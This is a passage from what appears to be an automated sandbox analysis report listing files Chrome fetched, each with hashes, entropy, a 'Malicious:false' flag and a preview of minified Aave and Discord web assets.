                                                                                                                                                                                                                                                  Entropy (8bit):4.934121702923784
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:Y5ucKrvidZlsro6PrYYAcg8idZlSj6jj1:Y5utvidZ+bDVAyidZLv1
                                                                                                                                                                                                                                                  MD5:F16C3BC9695A4616397C2A21C358FA27
                                                                                                                                                                                                                                                  SHA1:3373C310AF3414F3E4DC9263BBD00B8876B6F75B
                                                                                                                                                                                                                                                  SHA-256:D10714B83D74891A01FB171DA3FE1F9A547264D87BE3C8FC194A48A72C705066
                                                                                                                                                                                                                                                  SHA-512:A44E1AEE0026974E5E990A27185E2DC62986917943382C46C8D15719332A990451995A4E38022074032B6637FAF657727F5FEBBC2312C803BD258DB47B78E098
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:{"previousAPR":{"totalAPR":13.8495805377049,"actionsAPR":{"ethereum-borrow-eth":null,"ethereum-stkgho":13.8495805377049,"ethereum-borrow-gho":null,"weth":null,"gho":null,"stkgho":13.8495805377049}},"currentAPR":{"totalAPR":11.056958709007882,"actionsAPR":{"ethereum-borrow-eth":null,"ethereum-stkgho":11.056958709007882,"ethereum-borrow-gho":null,"weth":null,"gho":null,"stkgho":11.056958709007882}}}
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):117965
                                                                                                                                                                                                                                                  Entropy (8bit):5.4719388116538275
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:S2EaPtYP7u2RNmaeg3qqM3Qf1mlbxBCJYjNwGWYzFzeoUvT8KuVecXWJl28PaPRb:HvP6Tu4mSJAxMgrZfLezDa
                                                                                                                                                                                                                                                  MD5:F82FE3BB636FEF6A856E1768C47BA4E5
                                                                                                                                                                                                                                                  SHA1:FDF1E276E3D45B896DD7E29E181A87C300EFF1D9
                                                                                                                                                                                                                                                  SHA-256:E4F204B4CC4D83A0D642C453A1A62CF26343B21B8DDB35D251FA47FA32AC3B15
                                                                                                                                                                                                                                                  SHA-512:82B70776F284EE726EBC9C6FC7B8A0B81A718644CBE989E4D1F9EA9AF70150C87FA8CC355CA6CB683C73230E1C93D8B8A4B6FB9E775437004DBE9D309F47464C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5405],{56687:function(e,t,r){"use strict";r.r(t),r.d(t,{default:function(){return wn}});var n=r(49501),o=r(30120),a=r(29630),i=r(67294),s=r(34637),l=r(59379),c=r(46930),d=r(78371),u=r(45745),p=r(15446),x=r(70675),b=r(77537),h=r(75331),m=r(62097),v=r(61225),y=r(75084),j=r(11163),f=r(68861),g=r(57609),w=r(59499),C=r(80854),O=r(1279),k=r(82403),P=r(14379),Z=r(45884),A=r(99435),D=r(1475),S=r(69331),B=r(14795),T=r(43629),E=r(41551),I=r(69125),M=r(81902),R=r(25049),N=r(45556),U=r(73965),L=130,Y=160,_=130,F=function(e,t,r,n,o){return e?V(t,r,n,o||!1):W(t,r,n,o||!1)},V=function(e,t,r,n){return"symbol"===e?z(!0,t,r):"usageAsCollateralEnabledOnUser"===e||"debt"===e?r.sort((function(t,r){return Number(t[e])-Number(r[e])})):(n&&r.sort((function(e,t){return"Variable"===e.borrowRateMode?Number(t.reserve.variableBorrowAPY)-Number(e.reserve.variableBorrowAPY):Number(t.reserve.stableBorrowAPY)-Number(e.reserve.stableBorrowAPY)})),r.sort((function
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (21762)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):21811
                                                                                                                                                                                                                                                  Entropy (8bit):5.462655463719556
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:f1bjtqrVapZjquHCWnJcJhcby8XziQBy6HUKVMov5hHKs80K:JjtOVaJDnJcPc+EWQ8EM65RR8l
                                                                                                                                                                                                                                                  MD5:0FBB77D1B69F18DF0FDCF836DE1C4106
                                                                                                                                                                                                                                                  SHA1:E8CE4037B97732809F1E1BF24992959C678F2118
                                                                                                                                                                                                                                                  SHA-256:279E49A00A41A18545CF319B5A8B571FD48CFCC4B78A361BBE75A33CE7A4F71A
                                                                                                                                                                                                                                                  SHA-512:F73E3B25561D0D3307C7DD9D505F84101897CFA70737D757AED8D95BDC6A2CE116FD114674DD0BBE666AABE2176B0EEF150A5D4EE2C7C3CCE815A5CA73215D03
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/a6f6204cd40c3c5f5c14.js
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["71984"],{772425:function(t,r,n){var e=n(933676),o=n(938507),i=TypeError;t.exports=function(t){if(e(t))return t;throw i(o(t)+" is not a constructor")}},603528:function(t,r,n){var e=n(838957),o=TypeError;t.exports=function(t,r){if(e(r,t))return t;throw o("Incorrect invocation")}},212036:function(t){t.exports="undefined"!=typeof ArrayBuffer&&"undefined"!=typeof DataView},192291:function(t,r,n){var e,o,i,u=n(212036),f=n(325008),a=n(161581),c=n(354848),s=n(622281),y=n(740362),p=n(974971),h=n(938507),v=n(251069),d=n(859209),g=n(4340),l=n(838957),A=n(144748),w=n(276321),x=n(641236),b=n(457507),T=n(644659),E=T.enforce,I=T.get,R=a.Int8Array,m=R&&R.prototype,O=a.Uint8ClampedArray,M=O&&O.prototype,F=R&&A(R),U=m&&A(m),_=Object.prototype,L=a.TypeError,B=x("toStringTag"),C=b("TYPED_ARRAY_TAG"),S="TypedArrayConstructor",P=u&&!!w&&"Opera"!==p(a.opera),V=!1,N={Int8Array:1,Uint8Array:1,Uint8ClampedArray:1,Int16Array:2,U
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 38156, version 2.66
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):38156
                                                                                                                                                                                                                                                  Entropy (8bit):7.992862818603593
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:768:YLYEgWfC/zlP948Q4NxhBiMwYatzdYZyXSihSZ9ia6UBJlly12m9U:YLYEszTFQyxfiMwYmxYZ1p9ia6U7r4U
                                                                                                                                                                                                                                                  MD5:3D6549BF2F38372C054EAFB93FA358A9
                                                                                                                                                                                                                                                  SHA1:E7A50F91C7EC5D5D896B55FA964F57EE47E11A1B
                                                                                                                                                                                                                                                  SHA-256:8E401B056DC1EB48D44A01407CEB54372BBC44797D3259069CE96A96DFD8C104
                                                                                                                                                                                                                                                  SHA-512:4BDE638A4111B0D056464CE4FD45861208D1669C117E2632768ACD620FCD924AB6384B3133E4BAF7D537872166EB50CA48899B3909D9DBF2A111A7713322FAD4
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/c1b53be672aac192a996.woff2
                                                                                                                                                                                                                                                  Preview:wOF2..............|T.......B............................. .`..P..<..W.....8..}.6.$..`..r.. ..n..F..v[.Vq...Q.r......9.../h....r~..y...)Jv.._@....Z...cm.z.(...u..#EMKK..e.mm..2,.FK...Y..mk].{...[.^UR......8p.jD.n.t..k.....b!.C...&8...._.-n69(...N....o..w..1...|.i....!..\...n.^.Kq..../]x.........x..N...=.^".ZF.L.6lD...X..[u.-.............y....\...%.q.....u~.y.K..>.d{...P..BU..2..p.nO.z....y~.....#DT...S.(d-~E.m...][..s...\..+.t..\!H.......'V...@.w..r['bc:V...X.d.86..c.......Xd<..p..N".9...X6..(|.C..t....0x.E.....8_.....Xs..8(...4I.X2J,Y[[....U..^I.y.#...w.R.....).o..i.....a......t+...Pz.%..FB..&.$.dS*.!$...iM;.*...K....;M....z`iw..j;.Su.I...O.Z9.....d....-2.Y2k.5....M.g..1u.$....T../.K.R1... ..?....C.&.wk..N.X....h.B.......};K@S...@'..4.;...|x.I.R....zj..Ph....\7...<.m~U ......Hu.(|SV<...?$.....MO.9.....H..z~R..9rD..y..H........N*..i....}..*"23.+........|i.[..|w..=.a-..E4...f..[....O9..g....x.0.c.f4..p[m.e/...)P......5.M......../..6.&..5.Rw
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2396), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):2396
                                                                                                                                                                                                                                                  Entropy (8bit):5.217498919488569
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:ZJdEUcMhQelIvowEBF6SewIu2y6scjv6QxOQsVayOewnIJVzz0lXqFWrCZYbRsW+:hlI+BFDJIuRUl0ayrwnyVzTAgMy
                                                                                                                                                                                                                                                  MD5:74D4EF3CE343E94E59F435F5510A5DCC
                                                                                                                                                                                                                                                  SHA1:06723D4AA9891349F909CE32B72E4E5207DAC1C8
                                                                                                                                                                                                                                                  SHA-256:71E7F045231AE5BD9CE94A34D95115A47E221CCC06D6D5BDF88B70DD5069ECBA
                                                                                                                                                                                                                                                  SHA-512:FEAB26FC04FD78090C107BA8A0F4291397F0275F90E5A3C0205F75864E9455F27D60EDA1B844BFC8F052407888AF625B9388BC80000D3E8130CAAA3E304EF860
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/ZcUTDKp_rDmFKouqSkKwt/_buildManifest.js
                                                                                                                                                                                                                                                  Preview:self.__BUILD_MANIFEST=function(s,a,c,e,t,i,n,r,f,b,k,u,h,d){return{__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":[c,"static/chunks/4254-a9fee39d0c27297f.js","static/chunks/1573-e710bb2ca0646568.js",e,s,t,"static/chunks/9447-905d9c1c85542ff2.js",f,b,"static/chunks/pages/index-92ce489f6f7c51ed.js"],"/404":["static/chunks/pages/404-87ceb2d67c45a515.js"],"/500":["static/chunks/pages/500-b8751251f53c624c.js"],"/_error":["static/chunks/pages/_error-f7c9e698edebedd1.js"],"/bridge":[i,"static/chunks/9421-897510efb226106c.js",s,"static/chunks/pages/bridge-96a3176227b9387f.js"],"/faucet":[s,"static/chunks/pages/faucet-e11792d8635e9166.js"],"/governance":[n,a,i,r,k,"static/chunks/1315-7550bff8c0343bd6.js",u,"static/chunks/pages/governance-a17757b11c661747.js"],"/governance/ipfs-preview":[n,a,r,h,d,"static/chunks/pages/governance/ipfs-preview-14257c86a6d676db.js"],"/governance/v3/proposal":[n,a,i,r,h,d,"static/chunks/4343-05f12c64e4ca8ab6.js",u,"static/chunks/pages/governance/v3/propos
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (49742)
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):312274
                                                                                                                                                                                                                                                  Entropy (8bit):5.354260636320384
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:QLwgij5SVCfzhHXdSQ5Olhq3SYiLENM6HN26kRmddu:HY4t3Z5Olhq3SYiLENM6HN26kRcdu
                                                                                                                                                                                                                                                  MD5:0709B7D8D9FB80B10EAC55A7BD7EFAA8
                                                                                                                                                                                                                                                  SHA1:712DC25E13A9299D7BD25D67009A452BFD8B3449
                                                                                                                                                                                                                                                  SHA-256:28C9845679A5CA84CAAF1E4334B6F4B12C36AFAC55742833CBD4E2D9267F6B59
                                                                                                                                                                                                                                                  SHA-512:B2B238D3E75D8E3F2FBFD4627DB55932CEC82FA805121BAEB6BB3E65AC2C11F95F85F27A1DA9E95527D15FE08D0EB5A71B1F603FA99DCEA333012ABD8DFE58FF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html><html lang="en-us"><head><script>window.redwood={"consentGroups":{"C0001":true,"C0002":true,"C0003":true,"C0004":true},"country":"US","colo":"EWR","user":null,"rv1":"tsk","locale":"en-US"}</script>. <script type="text/javascript">. var OneTrust={"geolocationResponse":{"stateCode":"NY","countryCode":"US"}}. </script>. <script>. const acceptedLocales = [. 'en-au',. 'en-ca',. 'en-gb',. 'en-in',. 'en-us',. 'de-de',. 'es-es',. 'fr-fr',. 'it-it',. 'ja-jp',. 'ko-kr',....'pl-pl',. 'pt-br',. 'ru-ru',. 'zh-tw',. 'zh-cn',. 'zh-hans-cn',. ];. const orphanLocales = [. 'es-la',. 'sv-se',. 'nl-nl',. 'vi-vn',. 'th-th',. 'id-id',. 'tr-tr',. ];. const ignoreList = [. 'apps',. 'docs',. 'rate-limit-test',. 'rss',. ]. function getPathFromLocale(locale, code, pathString) {. if ( locale === code || !acceptedLocales.inclu
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (30017), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):30017
                                                                                                                                                                                                                                                  Entropy (8bit):5.548100928269389
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:eyPkWVecfOr8Wm4ehCs1FMumm2l51Rbe25inho:zeTrfehCLue3E2V
                                                                                                                                                                                                                                                  MD5:64D0012F057AD174CE09BEE086DCABCB
                                                                                                                                                                                                                                                  SHA1:541B4D683C2FF0E97DC44CB610D3363C2D6C9AC1
                                                                                                                                                                                                                                                  SHA-256:FD84BE519CEBD2F56A988E4977B905330A63D837A75587465F974A170AA15B57
                                                                                                                                                                                                                                                  SHA-512:5F54E67E35576CA905B2709E61D6FA13622B9311122EE8869493CE1F4C8CF39E171CB053CCF221FC879C60112E5775D4F9C404C9CBE0FAE7D92A5D824FEE836C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[425],{62753:function(e,t,n){var r=n(64836);t.Z=void 0;var o=r(n(64938)),i=n(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=a},81902:function(e,t,n){var r;n.d(t,{R:function(){return r}}),function(e){e.supplyCap="supplyCap",e.borrowCap="borrowCap"}(r||(r={}))},29002:function(e,t,n){n.d(t,{o:function(){return d}});var r=n(59499),o=n(4730),i=n(81645),a=n(85893),s=["sx"];function c(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (21082), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):21082
                                                                                                                                                                                                                                                  Entropy (8bit):5.322146231915684
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:zAZ0ga+5iem20B250eu0WQh9XpKUafieOmst:M0gaH20p/Qh9Xmf4t
                                                                                                                                                                                                                                                  MD5:A78FD337016215B4967246086EF0A1A1
                                                                                                                                                                                                                                                  SHA1:FE696508202BCA0042BA413CFC86BB02E61791C7
                                                                                                                                                                                                                                                  SHA-256:0B27542BF49F42594B53261D65312DCB0AFBCAA320398E13A053CCFBBF7CC472
                                                                                                                                                                                                                                                  SHA-512:A03BBFA5283D93BB7E56205B0B8BBEE1F562E85F24D28C208502D21BDA2E43E1A9603728A9D6DEA533B221A17A43EA7D5A2F7D82BB31E40FA1D3EECEA92E6D85
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/3000-a40fb3af74ef8ff5.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3e3],{15446:function(e,t,r){"use strict";r.d(t,{O:function(){return i}});var n=r(30120),o=r(64288),a=r(85893),i=function(e){var t=e.children;return(0,a.jsx)(n.Z,{sx:{display:"flex",flexDirection:"column",flex:1,mt:{xs:"-32px",lg:"-46px",xl:"-44px",xxl:"-48px"}},children:(0,a.jsx)(o.Z,{children:t})})}},40535:function(e,t,r){"use strict";r.d(t,{V:function(){return h}});var n=r(49501),o=r(62097),a=r(61225),i=r(30120),s=r(29630),c=r(75084),u=r(78371),p=r(67728),l=r(25563),d=r(68861),f=r(85893),h=function(e){var t=e.pageTitle,r=e.withMarketSwitcher,h=e.withMigrateButton,x=(0,u.Y)((function(e){return(0,p.lY)(e)})),b=(0,o.Z)(),m=(0,a.Z)(b.breakpoints.up("lg")),v=(0,a.Z)(b.breakpoints.down("xsm"));return(0,f.jsxs)(i.Z,{sx:{display:"flex",alignItems:{xs:"flex-start",xsm:"center"},mb:t?4:0,flexDirection:{xs:"column",xsm:"row"}},children:[t&&(v||!r)&&(0,f.jsx)(i.Z,{sx:{display:"flex",alignItems:"flex-start"},children:(0,f.jsx)(s.Z,{variant:
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (24489), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):24489
                                                                                                                                                                                                                                                  Entropy (8bit):5.302562550123366
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:yyPmovZoN9gXBv6+G0L+bTdt7+kKehydkJhLs+C0H4N/zJBfGbYsfY:yyP7vQ9gdF+bpt7+kv8GhLs+Z4VznfGc
                                                                                                                                                                                                                                                  MD5:48B63577B27E3FBFEACFB7E56FFC30CB
                                                                                                                                                                                                                                                  SHA1:7E10BC7D22CDD5D9CEBF1A00929EE1D6DE5BD146
                                                                                                                                                                                                                                                  SHA-256:92DE443F13C05C9AD18599E5A00AB4D67F86BC8221376E9D3EA526CB0840C007
                                                                                                                                                                                                                                                  SHA-512:DB7A183901225AEC25871777E9674228E0366EA910F0F6C964C16A3B2D206D5106E201B75F891B132E6235A6F9269211E748C170B9B9288C45FB196A0237A162
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/6782.5dfef7893dd5bea4.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6782],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),i=r(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=a},89722:function(e,t,r){r.d(t,{Z:function(){return y}});var n=r(87462),o=r(63366),i=r(67294),a=r(86010),c=r(94780),s=r(81719),u=r(78884),l=r(36622),p=r(34867);function f(e){return(0,p.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var d=r(85893);const h=["baseClassName","classNa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (34946), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):34946
                                                                                                                                                                                                                                                  Entropy (8bit):5.457354235629065
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:jAgViStNCbjImH+/fcHzR/tcHSHtcoycy70U7JMmWY4KkpS:jmbjIA2cHRtcHvlJMmWY9b
                                                                                                                                                                                                                                                  MD5:554846BAB685802E13EF376DE1DF527E
                                                                                                                                                                                                                                                  SHA1:70EF4F1124A4D5D2F927CA756B3DB4D2D2D2EF0E
                                                                                                                                                                                                                                                  SHA-256:C9E7A50C0D326089BDAE0E1C09B3569893B3537086B17DAF5AA1DB47B77332F2
                                                                                                                                                                                                                                                  SHA-512:9F36DB07AD639BA0A80537B6EAB4A9D7047C7B66EFBB052A78B13916F99505D9451BCDDEBF6F13FF47B76E17A38112822CB4BB5532BF296BA239C98E2EACCEB7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8879],{26814:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return be}});var i=n(17674),o=n(49501),a=n(75331),r=n(56365),s=n(30120),l=n(29630),c=n(79072),d=n(9144),x=n(75084),u=n(81645),h=n(5151),p=n(56371),m=n(5152),v=n(67294),j=n(59499),f=n(4730),b=n(70918),k=n(90149),g=n(41024),y=n(68861),w=n(72667),Z=n(58527),C=n(77912),A=n(78371),S=n(85893),T=function(e){var t,n,a,r,c,d,x,u,h,p=e.stakedToken,m=e.icon,v=(0,A.Y)((function(e){return e.currentMarketData})),j="",f=(0,C.I)(v).data;if(f&&Array.isArray(f)){var b=(0,i.Z)(f,4);d=b[0],x=b[1],u=b[2],h=b[3]}"AAVE"==p&&(j=(null===(t=d)||void 0===t?void 0:t.stakeApy)||"0"),"ABPT"==p&&(j=(null===(n=x)||void 0===n?void 0:n.stakeApy)||"0"),"GHO"==p&&(j=(null===(a=u)||void 0===a?void 0:a.stakeApy)||"0"),"ABPT V2"==p&&(j=(null===(r=h)||void 0===r?void 0:r.stakeApy)||"0");var k=Date.now()/1e3>Number(null===(c=u)||void 0===c?void 0:c.distributionEnd);return(0,S.jsxs)(s.Z,{sx:functi
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):203708
                                                                                                                                                                                                                                                  Entropy (8bit):3.826088104351986
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:zPgKNNJN86P5X208vLO9GINgxZhrRd51AlKDNXyadBYcOwg2oe6SeKqKTiq7Iq35:LgK/T5m7jajNgnh2eXOXrhqx8rzniowx
                                                                                                                                                                                                                                                  MD5:37EC3238EE9D47F7F0BFADE3868709E3
                                                                                                                                                                                                                                                  SHA1:D215C949078205B0CD56AB51CB519AFFB98F3D13
                                                                                                                                                                                                                                                  SHA-256:222B4FF6D02318E891A67E42E635897578F703C87F958C4C1D64FDB45D5550C5
                                                                                                                                                                                                                                                  SHA-512:EF213F8EDDF6165ED892EA3B8C51DA649CB478D7F6EBE67C0E6B36265716F519347BA218F41749120D50DE2D473B35203A10117B4701F514D7F0673436C76F21
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg viewBox="0 0 20 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M21.87-1.413H-2.167v16.826H21.87V-1.413Z" fill="#C60B1E"/><path d="M21.87 2.794H-2.167v8.413H21.87V2.793Z" fill="#FFC400"/><path d="M3.217 6.064s-.016 0-.025-.006a.38.38 0 0 1-.036-.034l-.022-.017-.02-.03s-.022-.04-.013-.071c.01-.03.029-.04.045-.05.016-.01.052-.021.052-.021s.028-.013.036-.013a.428.428 0 0 1 .041-.01s.01-.007.02-.011c.01-.004.022-.004.029-.006.006-.004.026-.007.035-.01l.052.003.052.004.07-.004c.013 0 .023-.004.036 0l.048.013.068.027c.016.007.058.013.074.021.02.01.029.023.039.038.01.013.01.027.012.037a.065.065 0 0 1 0 .038c-.004.01-.016.027-.016.027l-.02.034-.026.02s-.02.017-.032.017-.16-.03-.257-.03a1.179 1.179 0 0 0-.242.034Z" fill="#AD1519"/><path d="M3.72 6.072c-.003 0-.003 0 0 0-.005 0-.012-.004-.025-.004-.048-.007-.157-.028-.23-.028-.091 0-.232.028-.244.03-.004 0-.02 0-.026-.006a.29.29 0 0 1-.038-.034l-.023-.017-.02-.03c0-.004-.025-.044-.012-.074.013-.033.032-.044.048-.054a.266.266 0 0
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):92
                                                                                                                                                                                                                                                  Entropy (8bit):4.440074751043314
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:kw3dA4jgWYHJiv3dA4jgW6QfpXD3dA4jgW6Qen:FtDjdYHJwtDjd6EpXDtDjd6h
                                                                                                                                                                                                                                                  MD5:7C3F7E060745668041278118C0BB3D6D
                                                                                                                                                                                                                                                  SHA1:E639F56695B3CC30D78DCE7A0084AA8299A1311A
                                                                                                                                                                                                                                                  SHA-256:DE5341313A4DC5D982CA50AE4A491E84BC5E80B0F439D87F05FC3973C1B7E59A
                                                                                                                                                                                                                                                  SHA-512:B12A692EF9BE5857423F2DF563B986E241F7161573B5A7F23190696D1B0A50C5DA453C7BD35641FE61695B459D0A7D76F8053A8E0E0CCBC6811F800AAB1532C6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:self.__MIDDLEWARE_MANIFEST=[];self.__MIDDLEWARE_MANIFEST_CB&&self.__MIDDLEWARE_MANIFEST_CB()
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):77
                                                                                                                                                                                                                                                  Entropy (8bit):4.37144473219773
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:k0WYL12AvZ/W6QfpX/W6Qee:UYR2AvZO6EpXO6I
                                                                                                                                                                                                                                                  MD5:B6652DF95DB52FEB4DAF4ECA35380933
                                                                                                                                                                                                                                                  SHA1:65451D110137761B318C82D9071C042DB80C4036
                                                                                                                                                                                                                                                  SHA-256:6F5B4AA00D2F8D6AED9935B471806BF7ACEF464D0C1D390260E5FE27F800C67E
                                                                                                                                                                                                                                                  SHA-512:3390C5663EF9081885DF8CDBC719F6C2F1597A4E25168529598097E9472608A4A62EC7F7E0BC400D22AAC81BF6EA926532886E4DC6E4E272D3B588490A090473
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/ZcUTDKp_rDmFKouqSkKwt/_ssgManifest.js
                                                                                                                                                                                                                                                  Preview:self.__SSG_MANIFEST=new Set,self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB();
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (16629), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):16629
                                                                                                                                                                                                                                                  Entropy (8bit):5.3453787960037
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:Twub6zNykQupfSJ/Ixue2FDZh0e3UjHyT5LdB6je:1c0J/IQea1aW5T6je
